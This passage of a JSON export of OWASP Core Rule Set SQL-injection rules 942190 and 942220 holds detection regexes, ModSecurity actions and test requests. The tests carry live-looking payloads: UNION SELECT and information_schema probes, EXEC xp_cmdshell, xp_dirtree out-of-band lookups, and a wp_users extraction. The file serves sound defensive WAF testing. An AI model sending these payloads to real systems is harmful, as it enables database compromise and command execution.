"method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "database%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "database%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select%28user%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select%28user%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SeLect%2A%2F+1%2C2%2C3%2Cuser%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SeLect%2A%2F+1%2C2%2C3%2Cuser%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select%5D%3D%28ExtractValue%281%2C%28select%2520concat_ws%280x3a%2Cuser%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select%5D%3D%28ExtractValue%281%2C%28select%2520concat_ws%280x3a%2Cuser%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from+%60information_schema%60%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from+%60information_schema%60%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27select+H%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27select+H%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27%3Bselect+p%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27%3Bselect+p%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "FROM+INFORMATION_SCHEMA.%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "FROM+INFORMATION_SCHEMA.%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "+EXEC+xp_cmdshell%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "+EXEC+xp_cmdshell%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22%21+Y%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22%21+Y%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "exec+master.%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "exec+master.%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 23, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "into+outfile+%27%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "into+outfile+%27%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 24, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "Union+sElect%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "Union+sElect%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "selectect%2520user%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "selectect%2520user%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 26, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "+exec+master..xp_cmdshell%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "+exec+master..xp_cmdshell%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 27, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "selectect%252520user%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "selectect%252520user%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 28, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "execution%3De1s1%26OlyH%3D9767+AND+1%3D1+UNION+ALL+SELECT+1%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name+FROM+information_schema.tables+WHERE+2%3E1--%2F%2A%2A%2F%3B+EXEC+xp_cmdshell%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "execution%3De1s1%26OlyH%3D9767+AND+1%3D1+UNION+ALL+SELECT+1%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name+FROM+information_schema.tables+WHERE+2%3E1--%2F%2A%2A%2F%3B+EXEC+xp_cmdshell%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 29, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27%21%60%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27%21%60%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 30, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22%20UNION%20ALL%20SELECT%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22%20UNION%20ALL%20SELECT%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 31, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "EXec+xp_cmdshell%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "EXec+xp_cmdshell%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 32, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "FrOM+information_schema.%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "FrOM+information_schema.%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 33, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select+1+FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28user%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select+1+FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28user%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 34, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%60%211%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%60%211%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 35, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "uNioN++sElecT%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "uNioN++sElecT%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 36, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22%3BSELECT+P%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22%3BSELECT+P%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 37, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=UnIoN+SeLeCt%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=UnIoN+SeLeCt%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 38, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=1);declare @q varchar(99);set @q='\\\\j0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\\kph'; exec master.dbo.xp_dirtree @q;--" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=1);declare @q varchar(99);set @q='\\\\j0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\\kph'; exec master.dbo.xp_dirtree @q;--" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 39, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=content.ini);declare @q varchar(99);set @q='\\\\i1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\\lri'; exec master.dbo.xp_dirtree @q;--" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=content.ini);declare @q varchar(99);set @q='\\\\i1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\\lri'; exec master.dbo.xp_dirtree @q;--" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 40, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\\\\h5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\\vcr'; exec master.dbo.xp_dirtree @q;--" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\\\\h5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\\vcr'; exec master.dbo.xp_dirtree @q;--" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 41, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=test));declare @q varchar(99);set @q='\\\\zwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\\gej'; exec master.dbo.xp_dirtree @q;--" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=test));declare @q varchar(99);set @q='\\\\zwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\\gej'; exec master.dbo.xp_dirtree @q;--" } ] }, { "description": "MySQL SQLi using set variable", "test_id": 42, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=@.:=right(right((select+user_login+from+wordpress.wp_users+limit+1,1),1111),1111)+union%23%0adistinctrow%0bselect@." }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=@.:=right(right((select+user_login+from+wordpress.wp_users+limit+1,1),1111),1111)+union%23%0adistinctrow%0bselect@." } ] }, { "description": "False positive UNION #2047", "test_id": 43, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "arg=Die%20%22Union%20von%20Europa%22" }, "expected": { "should_block": false, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "arg=Die%20%22Union%20von%20Europa%22" } ] }, { "description": "MSSQL Logical Functions - IIF (Transact-SQL) - regression test", "test_id": 44, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "arg=SELECT%20IIF(1%20%3E%201%2C%20'TRUE'%2C%20'FALSE'%20)" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "arg=SELECT%20IIF(1%20%3E%201%2C%20'TRUE'%2C%20'FALSE'%20)" } ] }, { "description": "False positive IIF", "test_id": 45, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "arg=it%20is%20my%20beliif%20%28stemming%20from%20personal%20experience%29%2C%20that" }, "expected": { "should_block": false, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "arg=it%20is%20my%20beliif%20%28stemming%20from%20personal%20experience%29%2C%20that" } ] }, { "description": "False positive (word boundary)", "test_id": 46, "request": { "method": "GET", "uri": "/get", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "arg=appUser(sitename,user)" }, "expected": { "should_block": false, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "arg=appUser(sitename,user)" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 206, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\\"'`](?:[\\s\\x0b]*![\\s\\x0b]*[\\\"'0-9A-Z_-z]|;?[\\s\\x0b]*(?:having|select|union\\b[\\s\\x0b]*(?:all|(?:distin|sele)ct))\\b[\\s\\x0b]*[^\\s\\x0b])|\\b(?:(?:(?:c(?:onnection_id|urrent_user)|database|schema|user)[\\s\\x0b]*?|select.*?[0-9A-Z_a-z]?user)\\(|exec(?:ute)?[\\s\\x0b]+master\\.|from[^0-9A-Z_a-z]+information_schema[^0-9A-Z_a-z]|into[\\s\\x0b\\+]+(?:dump|out)file[\\s\\x0b]*?[\\\"'`]|union(?:[\\s\\x0b]select[\\s\\x0b]@|[\\s\\x0b\\(0-9A-Z_a-z]*?select))|[\\s\\x0b]*?exec(?:ute)?.*?[^0-9A-Z_a-z]xp_cmdshell|[^0-9A-Z_a-z]iif[\\s\\x0b]*?\\(", "actions": [ { "act_name": "id", "lineno": 207, "act_quote": "no_quote", "act_arg": "942190", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 208, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 209, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 210, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 211, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 211, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 211, "act_quote": "no_quote", "act_arg": "removeCommentsChar", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 212, "act_quote": "quotes", "act_arg": "Detects MSSQL code execution and information gathering attempts", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 213, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 214, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 215, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 216, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 217, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 218, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 219, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 220, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 221, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 222, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 223, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 224, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 225, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 206 } }, { "rule_id": "942220", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "^(?i:-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2250738585072007e-308|2.2250738585072011e-308|1e309)$", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Looking for integer overflow attacks, these are taken from skipfish, except 2.2.2250738585072011e-308 is the \\\"magic number\\\" crash", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Integer overflow taken from skipfish", "test_id": 1, "request": { "method": "GET", "uri": "/get?string_to_convert=4294967296", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942220 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "string_to_convert=4294967296" } ] }, { "description": "PHP strtod infinite loop", "test_id": 2, "request": { "method": "GET", "uri": "/get?i=2.2250738585072011e-308", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942220 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "i=2.2250738585072011e-308" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 230, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^(?i:-0000023456|4294967295|4294967296|2147483648|2147483647|0000012345|-2147483648|-2147483649|0000023456|2.2250738585072007e-308|2.2250738585072011e-308|1e309)$", "actions": [ { "act_name": "id", "lineno": 231, "act_quote": "no_quote", "act_arg": "942220", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 232, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 233, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 234, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 235, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 235, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 236, "act_quote": "quotes", "act_arg": "Looking for integer overflow attacks, these are taken from skipfish, except 2.2.2250738585072011e-308 is the \\\"magic number\\\" crash", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 237, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 238, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 239, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 240, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 241, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 242, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 243, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 244, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 245, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { 